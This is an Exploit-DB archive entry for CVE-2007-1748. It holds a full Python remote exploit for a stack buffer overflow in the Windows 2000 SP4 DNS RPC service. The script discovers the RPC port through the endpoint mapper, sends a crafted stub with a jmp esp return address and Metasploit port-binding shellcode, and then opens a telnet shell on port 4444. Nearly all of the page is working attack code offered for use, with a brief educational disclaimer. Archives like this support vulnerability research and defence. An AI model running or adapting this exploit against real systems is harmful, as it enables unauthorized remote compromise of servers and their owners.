Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow

EDB-ID:

3737

CVE:

2007-1748

EDB Verified:

Author:

Winny Thomas

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2007-04-15

Vulnerable App: 
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in https://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid

#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

# Stub sections taken from metasploit 
stub  = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00'
stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00'
stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
stub += '\\A' * 465
# At the time of overflow ESP points into our buffer which has each char 
# prepended by a '\' and our shellcode code is about 24+ bytes away from 
# where EDX points
stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode 
stub += '\\B' * 43 
# Translates to 'jmp EDX'
stub += '\\\xff\\\xe2'
stub += '\\A' * 134 
stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00'
stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
stub += shellcode

# Code ripped from core security document on impacket
# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf 
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
	trans = transport.SMBTransport(target, 139, 'epmapper')
	trans.connect()
	dce = dcerpc.DCERPC_v5(trans)
	dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
	pm = epm.DCERPCEpm(dce)
	handle = '\x00'*20
	while 1:
		dump = pm.portmap_dump(handle)
		if not dump.get_entries_num():
			break
		handle = dump.get_handle()
		entry = dump.get_entry().get_entry()
		if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
			port = entry.get_string_binding().split('[')[1][:-1]
			return int(port)

	print '[-] Could not locate DNS port; Target might not be running DNS'

def ExploitDNS(target, port):
	trans = transport.TCPTransport(target, port)
	trans.connect()
	dce = dcerpc.DCERPC_v5(trans)
	dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))	
	
	dce.call(0x01, stub)

def ConnectRemoteShell(target):
	connect = "/usr/bin/telnet " + target + " 4444"
	os.system(connect)

if __name__ == '__main__':
	try:
		target = sys.argv[1]
	except IndexError:
		print 'Usage: %s <target ip address>' % sys.argv[0]
		sys.exit(-1)

	print '[+] Locating DNS RPC port'
	port = DiscoverDNSport(target)
	print '[+] Located DNS RPC service on TCP port: %d' % port
	ExploitDNS(target, port)
	print '[+] Exploit sent. Connecting to shell in 3 seconds'
	time.sleep(3)
	ConnectRemoteShell(target)	

# milw0rm.com [2007-04-15]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services